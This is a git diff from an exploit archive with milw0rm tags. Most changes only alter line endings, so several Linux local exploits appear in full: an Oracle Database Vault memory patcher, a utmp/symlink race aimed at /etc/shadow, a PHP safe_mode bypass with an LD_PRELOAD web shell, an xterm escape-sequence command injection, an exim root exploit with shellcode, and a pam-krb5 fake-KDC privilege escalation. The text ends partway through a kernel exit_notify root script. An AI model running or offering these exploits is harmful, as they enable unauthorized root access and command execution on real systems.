*/ + if(uregs.orig_eax==__NR_clone) { + long *regs = 0; + + /* fprintf(stderr, "[%d] clone() syscall\n", getpid()); */ + ptrace(PTRACE_SYSCALL, child, 0, 0); + wait(&status); + if((orapid = ptrace(PTRACE_PEEKUSER, child, ®s[EAX], 0)) == -1) { + perror("ptrace(PTRACE_PEEKUSER): unable to get clone() retvalue\n"); + exit(-1); + } + fprintf(stderr, "[%d] clone() syscall in %d, tracing orapid=%d\n", getpid(), + child, orapid); + + /* attach to orapid, detach from sqlplus */ + if(ptrace(PTRACE_ATTACH, orapid, 0, 0) == -1) { + perror("ptrace(PTRACE_ATTACH) to orapid"); + exit(-1); + } + + while(1) { + ptrace(PTRACE_SYSCALL, orapid, 0, 0); + wait(&status); + ptrace(PTRACE_GETREGS, orapid, 0, &uregs); + if(uregs.orig_eax==__NR_execve) { + fprintf(stderr, "[%d] execve() syscall in %d, \n", getpid(), orapid); + /* end ptrace of syscall */ + ptrace(PTRACE_SYSCALL, orapid, 0, 0); + break; + } else { + //fprintf(stderr, "got %ld\n", uregs.orig_eax); + ptrace(PTRACE_SYSCALL, orapid, 0, 0); + } + } + + if(ptrace(PTRACE_DETACH, child, 0, 0) == -1) { + perror("ptrace(PTRACE_DETACH) from child"); + exit(-1); + } + + } else if(uregs.orig_eax==__NR_execve) { + fprintf(stderr, "[%d] execve() syscall in %d\n", getpid(), child); + } + } + + /* now we have oracle server process under our control :) */ + long dv_func = locate_dv_func(); + if(dv_func == 0) { + fprintf(stderr, "ERROR: unable to find function\n"); + exit(-1); + } + wait(&status); + + unsigned char buf[32]; + memset(buf, 0, sizeof(buf)); + getdata(orapid, dv_func, (char *)&buf, 32); + + /* dump opcodes */ + /* + for(i = 0; i < 31; i++) { + fprintf(stderr, "%x ", (unsigned char)buf[i]); + } */ + + if(!memcmp(buf, ASM_DV_FUNC_PROLOG, strlen(ASM_DV_FUNC_PROLOG))) { + unsigned char dv_status; + unsigned long woff = dv_func + strlen(ASM_DV_FUNC_PROLOG), woff2=woff; + + getdata(orapid, woff, (char *)&dv_status, 1); + fprintf(stderr, "[***] sucessfuly validated function, DatabaseVault=%d\n", dv_status); + fprintf(stderr, "[***] 
attempting to rewrite memory at 0x%lx\n", woff2); + + unsigned char my = 0; + putdata(orapid, woff2, (void *)&my, 1); + } + + if(ptrace(PTRACE_DETACH, orapid, 0, 0) == -1) { + perror("ptrace(PTRACE_DETACH) from orapid"); + exit(-1); + } + + wait(&status); + exit(0); +} + +// milw0rm.com [2008-11-20] diff --git a/platforms/linux/local/7313.sh b/platforms/linux/local/7313.sh index ab63d1407..1424b9180 100755 --- a/platforms/linux/local/7313.sh +++ b/platforms/linux/local/7313.sh 
@@ -1,98 +1,98 @@
-#!/bin/bash -
-
-echo '
- #include
- #include
- #include
- #include
- #include
- #include
-
- int main(int argc, char *argv[])
- {
- struct utmp entry;
- int i;
-
- entry.ut_type=LOGIN_PROCESS;
- strcpy(entry.ut_line,"/tmp/x");
- entry.ut_time=0;
- strcpy(entry.ut_user,"badguy");
- strcpy(entry.ut_host,"badhost");
- entry.ut_addr=0;
- for(i=1;i<9;i++) {
- entry.ut_pid=(pid_t)( i + (int)getpid() );
- sprintf(entry.ut_id,"bad%d",i);
- pututline(&entry);
- }
- }
-' > /tmp/fillutmp.c
-
-cc -o /tmp/fillutmp /tmp/fillutmp.c
-
-echo 'Ask someone with group utmp privileges to do:'
-echo ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'
-echo -n 'Press [RETURN] to continue... '
-read ANS
-
-echo '
- #include
-
- int main(int argc, char *argv[])
- {
- while(1)
- {
- unlink("/tmp/x");
- symlink(argv[1],"/tmp/x");
- unlink("/tmp/x");
- symlink(argv[2],"/tmp/x");
- }
- }
-' > /tmp/jigglelnk.c
-
-cc -o /tmp/jigglelnk /tmp/jigglelnk.c
-
-HOST=`hostname` # or simply localhost?
-echo "Which tty do you think a 'telnet $HOST' will use next?"
-echo "(Do that telnet and see...)"
-read TTY
-echo "You said it will be '$TTY' ..."
-
-ATK=/etc/debian_version # should be /etc/shadow
-
-echo "Starting symlink re-jiggler ..."
-/tmp/jigglelnk $TTY $ATK &
-JIG=$!
-
-LOOP=0
-while :; do
- ((LOOP = $LOOP + 1))
- echo; echo; echo "Try = $LOOP"
-
- /tmp/fillutmp
-
- echo "Telnetting... if login succeeds, just exit for next try..."
- /usr/bin/telnet $HOST
-
- LS=`ls -ld $ATK`
- case "$LS" in
- *root*root* ) ;; # not done yet...
- * )
- echo; echo
- echo "Success after $LOOP tries!"
- echo "$LS"
- echo; echo
- break
- ;;
- esac
-done
-
-kill $JIG
-rm /tmp/fillutmp /tmp/jigglelnk /tmp/x
-
-# ...
-# ~$ logout
-# Connection closed by foreign host.
-# Success after 12 tries!
-# -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version
-
-# milw0rm.com [2008-12-01]
+#!/bin/bash -
+
+echo '
+ #include
+ #include
+ #include
+ #include
+ #include
+ #include
+
+ int main(int argc, char *argv[])
+ {
+ struct utmp entry;
+ int i;
+
+ entry.ut_type=LOGIN_PROCESS;
+ strcpy(entry.ut_line,"/tmp/x");
+ entry.ut_time=0;
+ strcpy(entry.ut_user,"badguy");
+ strcpy(entry.ut_host,"badhost");
+ entry.ut_addr=0;
+ for(i=1;i<9;i++) {
+ entry.ut_pid=(pid_t)( i + (int)getpid() );
+ sprintf(entry.ut_id,"bad%d",i);
+ pututline(&entry);
+ }
+ }
+' > /tmp/fillutmp.c
+
+cc -o /tmp/fillutmp /tmp/fillutmp.c
+
+echo 'Ask someone with group utmp privileges to do:'
+echo ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'
+echo -n 'Press [RETURN] to continue... '
+read ANS
+
+echo '
+ #include
+
+ int main(int argc, char *argv[])
+ {
+ while(1)
+ {
+ unlink("/tmp/x");
+ symlink(argv[1],"/tmp/x");
+ unlink("/tmp/x");
+ symlink(argv[2],"/tmp/x");
+ }
+ }
+' > /tmp/jigglelnk.c
+
+cc -o /tmp/jigglelnk /tmp/jigglelnk.c
+
+HOST=`hostname` # or simply localhost?
+echo "Which tty do you think a 'telnet $HOST' will use next?"
+echo "(Do that telnet and see...)"
+read TTY
+echo "You said it will be '$TTY' ..."
+
+ATK=/etc/debian_version # should be /etc/shadow
+
+echo "Starting symlink re-jiggler ..."
+/tmp/jigglelnk $TTY $ATK &
+JIG=$!
+
+LOOP=0
+while :; do
+ ((LOOP = $LOOP + 1))
+ echo; echo; echo "Try = $LOOP"
+
+ /tmp/fillutmp
+
+ echo "Telnetting... if login succeeds, just exit for next try..."
+ /usr/bin/telnet $HOST
+
+ LS=`ls -ld $ATK`
+ case "$LS" in
+ *root*root* ) ;; # not done yet...
+ * )
+ echo; echo
+ echo "Success after $LOOP tries!"
+ echo "$LS"
+ echo; echo
+ break
+ ;;
+ esac
+done
+
+kill $JIG
+rm /tmp/fillutmp /tmp/jigglelnk /tmp/x
+
+# ...
+# ~$ logout
+# Connection closed by foreign host.
+# Success after 12 tries!
+# -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version
+
+# milw0rm.com [2008-12-01]
diff --git a/platforms/linux/local/7393.txt b/platforms/linux/local/7393.txt
index ff0ed2874..ec00ce264 100755
--- a/platforms/linux/local/7393.txt
+++ b/platforms/linux/local/7393.txt
@@ -1,116 +1,115 @@ - ------------------------------------------------------------------------ -+ safe-bypass-procopen.txt - yet another way to bypass PHP safe_mode. + -+ By Milen Rangelov + ------------------------------------------------------------------------ - - -This *should* work provided that you have met the following requirements: - -1) A writable directory under documentroot to place those files (obviously) -2) You don't have proc_open in your disabled_functions list -3) You are able to compile a shared library on the same platform as the target web server. - - -The reason I'm publishing that is because I posted a similar bug (putenv()+mail()) which was titled as "Bogus" one by the PHP developers. - -Now, this one uses quite the same concept, only different means. - - -How does this work? -------------------- - -You will need to upload 2 files - one precompiled shared library and a php script. Place them in the writable dir and just open http://victim/path/evil.php?c=arbitrarycommand - -You'll need to change the $path variable to match the writable directory - - -Here is the library code, compile with cc -o a.so -fPIC -shared a.c - -a.c: ----- - -#include -#include -#include -int getuid() -{ -char *en; -char *buf=malloc(300); -FILE *a; - -unsetenv("LD_PRELOAD"); -a=fopen(".comm","r"); -buf=fgets(buf,100,a); -write(2,buf,strlen(buf)); -fclose(a); -rename("a.so","b.so"); -system(buf); -system("mv output.txt .comm1"); -rename("b.so","a.so"); -free(buf); -return 0; -} - -*cut* - - - -And that is the PHP script: - -evil.php: -------------------------- - array("pipe", "r"), - 1 => array("file", $path."/output.txt","w"), - 2 => array("file", $path."/errors.txt", "a" ) -); - -$cwd = '.'; -$env = array('LD_PRELOAD' => $path."/a.so"); -$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed - - -sleep(1); -$a=fopen($path."/.comm1","r"); - -echo "
";
-while (!feof($a))
-{$b=fgets($a);echo $b;}
-fclose($a);
-echo "
"; - -?> - -*cut* - - -Yeah, I know, it's written pretty lame, it's just a PoC. - - - -Why does that work? -------------------- - -Because the PHP devs like to trust the environment. Especially the dynamic loader variables. In the original bug I posted into their bugtracking system, I suggested that they clean them in mail() for example, but....yuck the bug was classified as *bogus*. - -This demonstrates exactly the same problem. If you have safe_mode enabled, you cannot execute anything except the binaries in the safe mode exec dir. They prepend a trailing slash to your command string and strip "..". Yet, proc_open() enables you to provide your own environment to pass to the new process. proc_open() executes "/bin/sh -c yourcommand" and even though yourcommand is invalid, the LD_PRELOAD is passed to /bin/sh. - -/bin/sh loads your h4h0r library and then BOOM! - - -I hope you'd find that useful. - - -BTW....!!! Dolu naglite programisti :DDD !!! - -# milw0rm.com [2008-12-09] +----------------------------------------------------------------------- ++ safe-bypass-procopen.txt - yet another way to bypass PHP safe_mode. + ++ By Milen Rangelov + +----------------------------------------------------------------------- + + +This *should* work provided that you have met the following requirements: + +1) A writable directory under documentroot to place those files (obviously) +2) You don't have proc_open in your disabled_functions list +3) You are able to compile a shared library on the same platform as the target web server. + + +The reason I'm publishing that is because I posted a similar bug (putenv()+mail()) which was titled as "Bogus" one by the PHP developers. + +Now, this one uses quite the same concept, only different means. + + +How does this work? +------------------- + +You will need to upload 2 files - one precompiled shared library and a php script. 
Place them in the writable dir and just open http://victim/path/evil.php?c=arbitrarycommand + +You'll need to change the $path variable to match the writable directory + + +Here is the library code, compile with cc -o a.so -fPIC -shared a.c + +a.c: +---- + +#include +#include +#include +int getuid() +{ +char *en; +char *buf=malloc(300); +FILE *a; + +unsetenv("LD_PRELOAD"); +a=fopen(".comm","r"); +buf=fgets(buf,100,a); +write(2,buf,strlen(buf)); +fclose(a); +rename("a.so","b.so"); +system(buf); +system("mv output.txt .comm1"); +rename("b.so","a.so"); +free(buf); +return 0; +} + +*cut* + + + +And that is the PHP script: + +evil.php: +------------------------- + array("pipe", "r"), + 1 => array("file", $path."/output.txt","w"), + 2 => array("file", $path."/errors.txt", "a" ) +); + +$cwd = '.'; +$env = array('LD_PRELOAD' => $path."/a.so"); +$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed + + +sleep(1); +$a=fopen($path."/.comm1","r"); + +echo "
";
+while (!feof($a))
+{$b=fgets($a);echo $b;}
+fclose($a);
+echo "
";
+
+?>
+
+*cut*
+
+
+Yeah, I know, it's written pretty lame, it's just a PoC.
+
+
+
+Why does that work?
+-------------------
+
+Because the PHP devs like to trust the environment. Especially the dynamic loader variables. In the original bug I posted into their bugtracking system, I suggested that they clean them in mail() for example, but....yuck the bug was classified as *bogus*.
+
+This demonstrates exactly the same problem. If you have safe_mode enabled, you cannot execute anything except the binaries in the safe mode exec dir. They prepend a trailing slash to your command string and strip "..". Yet, proc_open() enables you to provide your own environment to pass to the new process. proc_open() executes "/bin/sh -c yourcommand" and even though yourcommand is invalid, the LD_PRELOAD is passed to /bin/sh.
+
+/bin/sh loads your h4h0r library and then BOOM!
+
+
+I hope you'd find that useful.
+
+
+BTW....!!! Dolu naglite programisti :DDD !!!
+
+# milw0rm.com [2008-12-09]
diff --git a/platforms/linux/local/741.pl b/platforms/linux/local/741.pl
index d3b0fb298..53d42b159 100755
--- a/platforms/linux/local/741.pl
+++ b/platforms/linux/local/741.pl
@@ -37,6 +37,6 @@ $new_ret = pack('l',($ret + $offset)); for ($i+=length($shellcode); $i<$len; $i+=4) {$buffer .=$new_ret}
-exec("$vulnprog $buffer");
-
-# milw0rm.com [2005-01-05]
+exec("$vulnprog $buffer");
+
+# milw0rm.com [2005-01-05]
diff --git a/platforms/linux/local/7681.txt b/platforms/linux/local/7681.txt
index 01acbfe0b..820cc3e66 100755
--- a/platforms/linux/local/7681.txt
+++ b/platforms/linux/local/7681.txt
@@ -1,27 +1,27 @@
-Package: xterm
-Version: 222-1etch2
-Severity: grave
-Tags: security patch
-Justification: user security hole
-
-
-DECRQSS Device Control Request Status String "DCS $ q" simply echoes
-(responds with) invalid commands. For example,
-perl -e 'print "\eP\$q\nbad-command\n\e\\"'
-would run bad-command.
-
-Exploitability is the same as for the "window title reporting" issue
-in DSA-380: include the DCS string in an email message to the victim,
-or arrange to have it in syslog to be viewed by root.
-
-Original:
-http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030
-
-Test:
-
-perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
-cat bla.log
-
-If whoami gets executed you should update.
-
-# milw0rm.com [2009-01-06]
+Package: xterm
+Version: 222-1etch2
+Severity: grave
+Tags: security patch
+Justification: user security hole
+
+
+DECRQSS Device Control Request Status String "DCS $ q" simply echoes
+(responds with) invalid commands. For example,
+perl -e 'print "\eP\$q\nbad-command\n\e\\"'
+would run bad-command.
+
+Exploitability is the same as for the "window title reporting" issue
+in DSA-380: include the DCS string in an email message to the victim,
+or arrange to have it in syslog to be viewed by root.
+
+Original:
+http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030
+
+Test:
+
+perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
+cat bla.log
+
+If whoami gets executed you should update.
+
+# milw0rm.com [2009-01-06]
diff --git a/platforms/linux/local/776.c b/platforms/linux/local/776.c
index b4d68cfb4..81196dae7 100755
--- a/platforms/linux/local/776.c
+++ b/platforms/linux/local/776.c
@@ -66,6 +66,6 @@ int main(int argc, char *argv[]){
 *(long*)(tayfasi+bizim) = RET;
 execl(NEREDE, NEREDE , bufe, NULL);
 }
-}
-
-// milw0rm.com [2005-01-26]
+}
+
+// milw0rm.com [2005-01-26]
diff --git a/platforms/linux/local/796.sh b/platforms/linux/local/796.sh
index 6a89edca8..5626e2001 100755
--- a/platforms/linux/local/796.sh
+++ b/platforms/linux/local/796.sh
@@ -1,46 +1,46 @@
-#!/bin/sh
-
-# Local Lame R00T sploit for exim <= 4.42
-# by Dark Eagle
-#
-# My First Coding Release In bash ))
-
-# Unl0ck Research Team
-#
-# More Effective than C-code.
-#
-# @env.c content:
-#
-###################################################
-# #include
-# #include
-# int main(int argc, char *argv[])
-# {
-# char *addr_ptr;
-# addr_ptr = getenv(argv[1]);
-# printf("%s @ %p\n", argv[1], addr_ptr);
-# return 0;
-# }
-###################################################
-
-gcc @env.c -o @env
-
-cp @env /usr/bin
-cd /usr/exim/bin
-
-CODE=`perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69
-\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`;export CODE
-
-@env CODE
-echo "So, dude, starting..."
-echo "NoW Just Type Address Of CODE"
-
-read ADDRESS
-
-echo "You are typed: $ADDRESS"
-
-echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!"
-
-./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'`
-
-# milw0rm.com [2005-02-07]
+#!/bin/sh
+
+# Local Lame R00T sploit for exim <= 4.42
+# by Dark Eagle
+#
+# My First Coding Release In bash ))
+
+# Unl0ck Research Team
+#
+# More Effective than C-code.
+#
+# @env.c content:
+#
+###################################################
+# #include
+# #include
+# int main(int argc, char *argv[])
+# {
+# char *addr_ptr;
+# addr_ptr = getenv(argv[1]);
+# printf("%s @ %p\n", argv[1], addr_ptr);
+# return 0;
+# }
+###################################################
+
+gcc @env.c -o @env
+
+cp @env /usr/bin
+cd /usr/exim/bin
+
+CODE=`perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69
+\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`;export CODE
+
+@env CODE
+echo "So, dude, starting..."
+echo "NoW Just Type Address Of CODE"
+
+read ADDRESS
+
+echo "You are typed: $ADDRESS"
+
+echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!"
+
+./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'`
+
+# milw0rm.com [2005-02-07]
diff --git a/platforms/linux/local/816.c b/platforms/linux/local/816.c
index e46752879..10ca2714b 100755
--- a/platforms/linux/local/816.c
+++ b/platforms/linux/local/816.c
@@ -54,6 +54,6 @@ perror("execl()"); exit(1); } return(0);
-}
-
-// milw0rm.com [2005-02-13]
+}
+
+// milw0rm.com [2005-02-13]
diff --git a/platforms/linux/local/824.c b/platforms/linux/local/824.c
index d5f4fd617..2b2335942 100755
--- a/platforms/linux/local/824.c
+++ b/platforms/linux/local/824.c
@@ -67,6 +67,6 @@ execl(argv[1],"VisualBoyAdvance",buffer,0); free(buffer); return 0;
-}
-
-// milw0rm.com [2005-09-13]
+}
+
+// milw0rm.com [2005-09-13]
diff --git a/platforms/linux/local/8303.c b/platforms/linux/local/8303.c
index 75928eb4d..f9559d111 100755
--- a/platforms/linux/local/8303.c
+++ b/platforms/linux/local/8303.c
@@ -1,163 +1,163 @@ -/* - * cve-2009-0360.c - * - * pam-krb5 < 3.13 local privilege escalation - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360 - * - * pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly - * initialize the Kerberos libraries for setuid use, which allows local - * users to gain privileges by pointing an environment variable to a - * modified Kerberos configuration file, and then launching a PAM-based - * setuid application. - * - * Usage: - * - * $ gcc cve-2009-0360.c -o cve-2009-0360 - * $ ./cve-2009-0360 - * [+] creating krb5.conf - * [+] creating kdc.conf - * [+] creating kerberos database - * Loading random data - * Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM', - * master key name 'K/M@TEST.COM' - * [+] adding principal root@TEST.COM - * Authenticating as principal root@TEST.COM with password. - * Enter KDC database master key: - * WARNING: no policy specified for root@TEST.COM; defaulting to no policy - * Principal "root@TEST.COM" created. - * [+] launching krb5kdc on 141.212.110.163:6666 - * [+] launching su with fake KDC configuration - * [+] enter "root" at the password prompt - * Password: - * # id - * uid=0(root) gid=0(root) ... - * - * Notes: - * - * This exploit will result in local privilege escalation on hosts that use - * the pam-krb5 module for su authentication. Check the su and system-auth - * PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use. - * Some customization of the defined constants and paths may be necessary - * for your environment. Be sure to set FAKE_KDC_HOST to the IP address of - * an active non-loopback interface on the target machine. 
- */ - -#include -#include -#include -#include -#include -#include -#include -#include - -#define REALM "TEST.COM" -#define FAKE_KDC_HOST "141.212.110.163" -#define FAKE_KDC_PORT "6666" -#define PRINCIPAL_NAME "root" -#define PRINCIPAL_PASS "root" -#define TMP_DIR "/tmp/cve-2009-0360" -#define KUTIL_PATH "/usr/sbin/kdb5_util" -#define KADMIN_PATH "/usr/sbin/kadmin.local" -#define KRB5KDC_PATH "/usr/sbin/krb5kdc" - -#define KRB5_CONF \ - "[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \ - " = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \ - "default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \ - "\n\t}\n\n[domain_realm]\n\t." REALM " = " REALM "\n\t" REALM " = " REALM - -#define KDC_CONF \ - "[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \ - " = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \ - "FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \ - "\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \ - "\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}" - -int -main(void) -{ - int ret; - FILE *fp; - char *err; - - ret = mkdir(TMP_DIR, 0755); - if (ret == -1 && errno != EEXIST) { - err = "cannot create TMP_DIR"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - return 1; - } - - printf("[+] creating krb5.conf\n"); - sleep(1); - - fp = fopen(TMP_DIR "/krb5.conf", "w"); - if (!fp) { - err = "cannot open krb5.conf"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - return 1; - } - fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp); - fclose(fp); - - printf("[+] creating kdc.conf\n"); - sleep(1); - - fp = fopen(TMP_DIR "/kdc.conf", "w"); - if (!fp) { - err = "cannot open kdc.conf"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - return 1; - } - fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp); - fclose(fp); - - chdir(TMP_DIR); - - printf("[+] creating kerberos database\n"); - sleep(1); - - ret 
= system(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR \ - "/stash -r " REALM " -s -P \"\""); - if (WEXITSTATUS(ret) != 0) { - err = "kdb5_util command returned non-zero"; - printf("[-] Error: %s, continuing exploit anyway\n", err); - } - - printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n"); - sleep(1); - - ret = system("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM \ - " -d " TMP_DIR "/principal -r " REALM " -q \"add_principal " \ - "-pw " PRINCIPAL_PASS " " PRINCIPAL_NAME "@" REALM "\""); - if (WEXITSTATUS(ret) != 0) { - err = "kadmin.local command returned non-zero"; - printf("[-] Error: %s, continuing exploit anyway\n", err); - } - - printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n"); - sleep(1); - - ret = system("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH \ - " -d " TMP_DIR "/principal -r " REALM); - if (WEXITSTATUS(ret) != 0) { - err = "krb5kdc command returned non-zero"; - printf("[-] Error: %s, continuing exploit anyway\n", err); - } - - printf("[+] launching su with fake KDC configuration\n"); - sleep(1); - printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n"); - sleep(1); - - system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su"); - - return 0; -} - -// milw0rm.com [2009-03-29] +/* + * cve-2009-0360.c + * + * pam-krb5 < 3.13 local privilege escalation + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360 + * + * pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly + * initialize the Kerberos libraries for setuid use, which allows local + * users to gain privileges by pointing an environment variable to a + * modified Kerberos configuration file, and then launching a PAM-based + * setuid application. 
+ * + * Usage: + * + * $ gcc cve-2009-0360.c -o cve-2009-0360 + * $ ./cve-2009-0360 + * [+] creating krb5.conf + * [+] creating kdc.conf + * [+] creating kerberos database + * Loading random data + * Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM', + * master key name 'K/M@TEST.COM' + * [+] adding principal root@TEST.COM + * Authenticating as principal root@TEST.COM with password. + * Enter KDC database master key: + * WARNING: no policy specified for root@TEST.COM; defaulting to no policy + * Principal "root@TEST.COM" created. + * [+] launching krb5kdc on 141.212.110.163:6666 + * [+] launching su with fake KDC configuration + * [+] enter "root" at the password prompt + * Password: + * # id + * uid=0(root) gid=0(root) ... + * + * Notes: + * + * This exploit will result in local privilege escalation on hosts that use + * the pam-krb5 module for su authentication. Check the su and system-auth + * PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use. + * Some customization of the defined constants and paths may be necessary + * for your environment. Be sure to set FAKE_KDC_HOST to the IP address of + * an active non-loopback interface on the target machine. + */ + +#include +#include +#include +#include +#include +#include +#include +#include + +#define REALM "TEST.COM" +#define FAKE_KDC_HOST "141.212.110.163" +#define FAKE_KDC_PORT "6666" +#define PRINCIPAL_NAME "root" +#define PRINCIPAL_PASS "root" +#define TMP_DIR "/tmp/cve-2009-0360" +#define KUTIL_PATH "/usr/sbin/kdb5_util" +#define KADMIN_PATH "/usr/sbin/kadmin.local" +#define KRB5KDC_PATH "/usr/sbin/krb5kdc" + +#define KRB5_CONF \ + "[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \ + " = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \ + "default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \ + "\n\t}\n\n[domain_realm]\n\t." 
REALM " = " REALM "\n\t" REALM " = " REALM + +#define KDC_CONF \ + "[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \ + " = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \ + "FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \ + "\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \ + "\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}" + +int +main(void) +{ + int ret; + FILE *fp; + char *err; + + ret = mkdir(TMP_DIR, 0755); + if (ret == -1 && errno != EEXIST) { + err = "cannot create TMP_DIR"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + return 1; + } + + printf("[+] creating krb5.conf\n"); + sleep(1); + + fp = fopen(TMP_DIR "/krb5.conf", "w"); + if (!fp) { + err = "cannot open krb5.conf"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + return 1; + } + fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp); + fclose(fp); + + printf("[+] creating kdc.conf\n"); + sleep(1); + + fp = fopen(TMP_DIR "/kdc.conf", "w"); + if (!fp) { + err = "cannot open kdc.conf"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + return 1; + } + fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp); + fclose(fp); + + chdir(TMP_DIR); + + printf("[+] creating kerberos database\n"); + sleep(1); + + ret = system(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR \ + "/stash -r " REALM " -s -P \"\""); + if (WEXITSTATUS(ret) != 0) { + err = "kdb5_util command returned non-zero"; + printf("[-] Error: %s, continuing exploit anyway\n", err); + } + + printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n"); + sleep(1); + + ret = system("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM \ + " -d " TMP_DIR "/principal -r " REALM " -q \"add_principal " \ + "-pw " PRINCIPAL_PASS " " PRINCIPAL_NAME "@" REALM "\""); + if (WEXITSTATUS(ret) != 0) { + err = "kadmin.local command returned non-zero"; + printf("[-] Error: %s, continuing exploit anyway\n", err); + } + + 
printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n"); + sleep(1); + + ret = system("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH \ + " -d " TMP_DIR "/principal -r " REALM); + if (WEXITSTATUS(ret) != 0) { + err = "krb5kdc command returned non-zero"; + printf("[-] Error: %s, continuing exploit anyway\n", err); + } + + printf("[+] launching su with fake KDC configuration\n"); + sleep(1); + printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n"); + sleep(1); + + system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su"); + + return 0; +} + +// milw0rm.com [2009-03-29] diff --git a/platforms/linux/local/8369.sh b/platforms/linux/local/8369.sh index c04e1312d..344e17796 100755 --- a/platforms/linux/local/8369.sh +++ b/platforms/linux/local/8369.sh 
@@ -1,103 +1,103 @@ -#!/bin/sh - -################################################################################### -# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit -# -# by Milen Rangelov (gat3way-at-gat3way-dot-eu) -# -# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov. -# Basically it allows us to send arbitrary signals to a privileged (suidroot) -# parent process. Due to a bad check, the child process with appropriate exit signal -# already set can first execute a suidroot binary then exit() and thus bypass -# in-kernel privilege checks. We use chfn and gpasswd for that purpose. -# -# !!!!!!!!!!! -# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 -# so you'll be out of luck most of the time. -# So it is not going to be the script kiddies' new killer shit :-) -# !!!!!!!!!!! -# -# if you invent a better way to escalate privileges by sending arbitrary signals to -# the parent process, please mail me :) That was the best I could think of today :-( -# -# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness -# -# Skuchna rabota... -# -#################################################################################### - - - - -SUIDDUMP=`cat /proc/sys/fs/suid_dumpable` -if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi -if [ -d /etc/logrotate.d ]; then -echo "logrotate 